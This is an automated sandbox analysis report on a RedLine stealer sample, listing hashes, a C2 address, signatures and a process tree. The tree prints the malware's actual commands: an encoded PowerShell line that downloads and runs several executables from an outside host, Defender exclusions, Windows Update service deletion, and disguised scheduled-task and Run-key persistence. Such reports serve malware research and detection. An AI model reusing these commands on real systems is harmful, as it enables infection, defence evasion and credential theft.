Analysis
- max time kernel: 150s
- max time network: 105s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28/01/2023, 19:33
- Static task: static1
- Behavioral task: behavioral1
  Sample: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
  Resource: win7-20220812-en
- Behavioral task: behavioral2
  Sample: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
  Resource: win10v2004-20220812-en
General
- Target: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
- Size: 361KB
- MD5: 18852c1659b6641a1f4eeacf6ce6bb8d
- SHA1: 1d678410484e34165adb652f7e86a2b5cae5f58d
- SHA256: 34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
- SHA512: 86295df5931e4673fc6579c1d6425040dbf44c6fbd5c19a35228f1c9f8d4917944c8ff020998d4504853398e7640664bf10c275835b1bfa7a236a073ed518b74
- SSDEEP: 6144:lUNamFD8LPUsNuwibRhinAoCRH+SXm+iMvOfcLpp0AdgqMGjEAOe75wBNEj+nc:lUFD8LPaw2RhinATReSXmPMvBBdqZBNU
Malware Config
- Extracted
  Family: redline
  1
  C2: 107.182.129.73:21733
  auth_value: 3a5bb0917495b4312d052a0b8977d2bb
Signatures
- Modifies security service (2 TTPs, 5 IoCs)
  description | ioc | Process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine payload (1 IoCs)
  resource | yara_rule
  behavioral2/memory/4568-174-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
- Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
  description | pid | Process | procid_target
  PID 2944 created 3216 | 2944 | WerFault.exe | 132
  PID 4392 created 2908 | 4392 | WerFault.exe | 135
- Suspicious use of NtCreateUserProcessOtherParentProcess (7 IoCs)
  description | pid | Process | procid_target
  PID 3316 created 3032 | 3316 | SmartDefRun.exe | 32
  PID 3316 created 3032 | 3316 | SmartDefRun.exe | 32
  PID 3316 created 3032 | 3316 | SmartDefRun.exe | 32
  PID 3316 created 3032 | 3316 | SmartDefRun.exe | 32
  PID 4536 created 588 | 4536 | powershell.EXE | 6
  PID 3768 created 3216 | 3768 | svchost.exe | 132
  PID 3768 created 2908 | 3768 | svchost.exe | 135
- Blocklisted process makes network request (1 IoCs)
  flow | pid | Process
  18 | 1876 | powershell.exe
- Downloads MZ/PE file
- Drops file in Drivers directory (1 IoCs)
  description | ioc | Process
  File created | C:\Windows\System32\drivers\etc\hosts | SmartDefRun.exe
- Executes dropped EXE (5 IoCs)
  pid | Process
  3096 | C4Loader.exe
  4800 | new2.exe
  3296 | SysApp.exe
  3316 | SmartDefRun.exe
  1892 | fodhelper.exe
- Stops running service(s) (3 TTPs)
- Uses the VBS compiler for execution (1 TTPs)
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Drops file in System32 directory (16 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 | svchost.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
  File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
- Suspicious use of SetThreadContext (4 IoCs)
  description | pid | Process | procid_target
  PID 1180 set thread context of 1604 | 1180 | 1d678410484e34165adb652f7e86a2b5cae5f58d.exe | 81
  PID 4800 set thread context of 4568 | 4800 | new2.exe | 97
  PID 3316 set thread context of 1940 | 3316 | SmartDefRun.exe | 121
  PID 4536 set thread context of 4920 | 4536 | powershell.EXE | 126
- Drops file in Program Files directory (1 IoCs)
  description | ioc | Process
  File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | SmartDefRun.exe
- Launches sc.exe (5 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid | Process
  1124 | sc.exe
  1412 | sc.exe
  4932 | sc.exe
  3476 | sc.exe
  4864 | sc.exe
- Program crash (6 IoCs)
  pid | pid_target | Process | procid_target
  2360 | 1180 | WerFault.exe | 79
  2728 | 4800 | WerFault.exe | 93
  4696 | 4204 | WerFault.exe | 60
  3600 | 3284 | WerFault.exe | 31
  1156 | 3216 | WerFault.exe | 132
  3480 | 2908 | WerFault.exe | 135
- Checks processor information in registry (2 TTPs, 12 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  3756 | schtasks.exe
- Enumerates system info in registry (2 TTPs, 8 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
- Modifies data under HKEY_USERS (64 IoCs)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- C:\Windows\system32\lsass.exe (PID 676)
  Command line: C:\Windows\system32\lsass.exe
- C:\Windows\system32\winlogon.exe (PID 588)
  Command line: winlogon.exe
  - C:\Windows\system32\dwm.exe (PID 312)
    Command line: "dwm.exe"
  - C:\Windows\System32\dllhost.exe (PID 4920)
    Command line: C:\Windows\System32\dllhost.exe /Processid:{ad4086f3-73e0-4394-9657-9f4e087405a6}
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
- C:\Windows\system32\svchost.exe (PID 956)
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe (PID 440)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe (PID 868)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\System32\svchost.exe (PID 732)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe (PID 1228)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\System32\svchost.exe (PID 1196)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  Signatures: Drops file in System32 directory
- C:\Windows\system32\svchost.exe (PID 1188)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  Signatures: Drops file in System32 directory
  - C:\Windows\system32\taskhostw.exe (PID 2480)
    Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE (PID 4676)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[obfuscated PowerShell command line omitted; it resolves AmsiScanBuffer in amsi.dll, overwrites its first bytes after a VirtualProtect call, then loads and runs a .NET assembly read from the registry value HKLM\SOFTWARE\dialerstager]"
    Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
    - C:\Windows\System32\Conhost.exe (PID 1260)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[obfuscated PowerShell command line omitted; it resolves AmsiScanBuffer in amsi.dll, overwrites its first bytes after a VirtualProtect call, then loads and runs a .NET assembly read from the registry value HKLM\SOFTWARE\dialerstager]"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4536

[depth 3] C:\Windows\System32\Conhost.exe
  command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID:2252
[depth 2] C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  command line: C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  - Executes dropped EXE
  PID:1892

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
  PID:1036

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
  PID:1668

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
  PID:2096

[depth 1] C:\Windows\system32\sihost.exe
  command line: sihost.exe
  PID:2348

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
  PID:2552

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  PID:2776

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
  PID:2764

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  PID:2688

[depth 1] C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:3284

[depth 2] C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -u -p 3284 -s 764
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3600

[depth 1] C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  PID:3032

[depth 2] C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1180

[depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  - Suspicious use of WriteProcessMemory
  PID:1604
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUw
B5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1876

[depth 5] C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
  - Executes dropped EXE
  PID:3096

[depth 5] C:\Users\Admin\AppData\Local\Temp\new2.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\new2.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4800

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4568

[depth 6] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 284
  - Program crash
  PID:2728

[depth 5] C:\Users\Admin\AppData\Local\Temp\SysApp.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3296

[depth 6] C:\Windows\SysWOW64\schtasks.exe
  command line: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
  - Creates scheduled task(s)
  PID:3756

[depth 7] C:\Windows\System32\Conhost.exe
  command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID:3340

[depth 5] C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3316

[depth 3] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 252
  - Program crash
  PID:2360

[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4164

[depth 2] C:\Windows\System32\cmd.exe
  command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - Suspicious use of WriteProcessMemory
  PID:3172

[depth 3] C:\Windows\System32\sc.exe
  command line: sc stop UsoSvc
  - Launches sc.exe
  PID:1124

[depth 3] C:\Windows\System32\sc.exe
  command line: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID:1412

[depth 3] C:\Windows\System32\sc.exe
  command line: sc stop wuauserv
  - Launches sc.exe
  PID:4932

[depth 3] C:\Windows\System32\sc.exe
  command line: sc stop bits
  - Launches sc.exe
  PID:3476

[depth 3] C:\Windows\System32\sc.exe
  command line: sc stop dosvc
  - Launches sc.exe
  PID:4864

[depth 3] C:\Windows\System32\reg.exe
  command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  PID:4124

[depth 3] C:\Windows\System32\reg.exe
  command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  PID:548

[depth 3] C:\Windows\System32\reg.exe
  command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  - Modifies security service
  PID:4820

[depth 3] C:\Windows\System32\reg.exe
  command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  PID:4632

[depth 3] C:\Windows\System32\reg.exe
  command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  PID:3432
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1780

[depth 2] C:\Windows\System32\dialer.exe
  command line: C:\Windows\System32\dialer.exe
  PID:1940

[depth 1] C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:3436

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
  PID:2752

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
  PID:2692

[depth 1] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  PID:2676

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Drops file in System32 directory
  PID:2668

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
  PID:2560

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
  PID:2392

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
  PID:2112

[depth 1] C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:4700

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  PID:1524

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
  PID:2340

[depth 1] C:\Windows\system32\SppExtComObj.exe
  command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  PID:1900

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  PID:4600

